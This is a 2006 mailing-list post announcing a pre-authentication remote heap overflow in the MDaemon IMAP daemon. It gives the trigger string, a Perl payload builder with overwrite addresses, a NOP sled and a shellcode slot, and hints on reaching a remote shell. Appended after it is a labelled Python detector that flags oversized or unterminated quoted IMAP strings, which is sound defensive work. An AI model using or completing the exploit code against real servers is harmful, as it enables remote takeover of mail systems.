Message-ID: <4479A48E.60104@gmx.net>
Date: Sun May 28 14:24:38 2006
From: kingcope at gmx.net (kcope)
Subject: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez*

MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the ", it is important :)
[X] consists of e.g. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the 
PEB Lock) :)

Sample code:
$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A

$nops = "A" x 100;
$a = $nops . $shellcode
   . ("Z" x (0x2006 - length($shellcode) - length($nops)))
   . $what . $where
   . ("Z" x (0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
close($sock);

Best Regards,
kcope
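A detensive check shaped to the trigger above, as an added example that is not part of the original post and not MDaemon code: it parses the argument part of one IMAP command line, honours the backslash escapes permitted inside quoted strings, and flags a quoted string that is never closed before CRLF or is abnormally long, so an IDS or mail proxy can alert on the a001 "[X] shape before it reaches the daemon. The 1024-byte threshold and the two sample lines are assumptions.

```python
# Assumed threshold: no legitimate client string argument should approach
# this size. Tune per deployment.
MAX_QUOTED_LEN = 1024


def scan_quoted_args(args: bytes):
    """Walk the argument part of an IMAP command, honouring the \\" and \\\\
    escapes allowed inside quoted strings (RFC 3501). Returns a list of
    (length, terminated) tuples, one per quoted string encountered."""
    out = []
    in_quote = False
    start = 0
    i = 0
    while i < len(args):
        c = args[i:i + 1]
        if not in_quote:
            if c == b'"':
                in_quote = True
                start = i + 1
        else:
            if c == b'\\' and i + 1 < len(args):
                i += 2          # skip the escaped character
                continue
            if c == b'"':
                out.append((i - start, True))
                in_quote = False
        i += 1
    if in_quote:                # hit end of line with the quote still open
        out.append((len(args) - start, False))
    return out


def check_imap_command(line: bytes) -> dict:
    """Classify one client command line; the result can feed an alert or a
    proxy drop rule. Unterminated or oversized quoted strings are flagged."""
    body = line.rstrip(b"\r\n")
    tag, _, args = body.partition(b" ")
    result = {"tag": tag.decode("ascii", "replace"), "suspicious": False, "reason": None}
    for length, terminated in scan_quoted_args(args):
        if length > MAX_QUOTED_LEN:
            kind = "unterminated" if not terminated else "oversized"
            result["suspicious"] = True
            result["reason"] = f"{kind} quoted string of {length} bytes"
            break
    return result


# Constructed samples: a benign LOGIN and the advisory's trigger shape.
BENIGN = b'a002 LOGIN "alice" "s3cret\\"pw"\r\n'
TRIGGER = b'a001 "' + b"Z" * 99555 + b"\r\n"

if __name__ == "__main__":
    for sample in (BENIGN, TRIGGER):
        print(check_imap_command(sample))
```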
